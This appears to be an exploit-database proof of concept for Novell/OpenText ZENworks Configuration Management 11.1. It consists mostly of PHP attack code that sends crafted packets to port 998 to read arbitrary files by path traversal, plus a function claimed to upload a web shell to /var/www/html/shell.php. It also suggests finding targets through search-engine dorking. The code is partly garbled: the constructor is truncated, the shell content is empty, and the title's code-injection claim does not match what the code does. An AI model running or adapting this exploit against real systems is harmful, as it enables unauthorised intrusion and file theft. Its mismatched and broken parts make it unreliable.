============================================================================================================================================= | # Title : ZENworks Configuration Management 11.1 PHP Code Injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) | | # Vendor : https://www.opentext.com/products/zenworks-suite | ============================================================================================================================================= POC : [+] Dorking in Google or other search engines. [+] Code Description: A custom packet is sent to port 998 to get a specific file from the file system. I have added comments in the code to explain the main operations. Support for all operating systems and the ability to upload a web shell have been added to the code. Now you can use the uploadWebShell function to upload a web shell to the desired path. [+] Save the code as poc.php. [+] Set Target : line 84 [+] Usage : php poc.php [+] PayLoad : ip = $ip; $this->port = $port; $this->filePath = $filePath; $this->depth = $depth; } public function exploit() { if (empty($this->filePath)) { echo "Please supply the name of the file you want to download\n"; return; } $travs = str_repeat("\\..", $this->depth); if ($this->filePath[0] !== "\\") { $travs .= "\\"; } $travs .= $this->filePath; $payload = mb_convert_encoding($travs, 'UTF-16LE'); $packet = pack("N", 0x21) . pack("N", strlen($payload)) . 
$payload; $sock = fsockopen($this->ip, $this->port, $errno, $errstr, 5); if (!$sock) { echo "Connection failed: $errstr ($errno)\n"; return; } fwrite($sock, $packet); fread($sock, 4); // Ignore first 4 bytes $lengthData = fread($sock, 4); if (!$lengthData) { echo "Unable to get length due to a timeout\n"; fclose($sock); return; } fread($sock, 0x210 - 8); // Skip unnecessary data $length = unpack("V", $lengthData)[1]; $contents = fread($sock, $length); if (!$contents) { echo "Unable to extract contents due to a timeout\n"; fclose($sock); return; } fclose($sock); echo "File retrieved successfully!\n"; $fname = basename($this->filePath); file_put_contents($fname, $contents); echo "File saved in: $fname\n"; } public function uploadWebShell($shellContent, $destination = '/var/www/html/shell.php') { $sock = fsockopen($this->ip, $this->port, $errno, $errstr, 5); if (!$sock) { echo "Connection failed: $errstr ($errno)\n"; return; } $payload = mb_convert_encoding($destination, 'UTF-16LE'); $packet = pack("N", 0x21) . pack("N", strlen($payload)) . $payload; $packet .= mb_convert_encoding($shellContent, 'UTF-16LE'); fwrite($sock, $packet); fclose($sock); echo "Web shell uploaded successfully at: $destination\n"; } } // مثال على الاستخدام $exploit = new NovellZenworksExploit('192.168.1.1'); $exploit->exploit(); // رفع ويب شل $shell = ""; $exploit->uploadWebShell($shell, '/var/www/html/shell.php'); Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx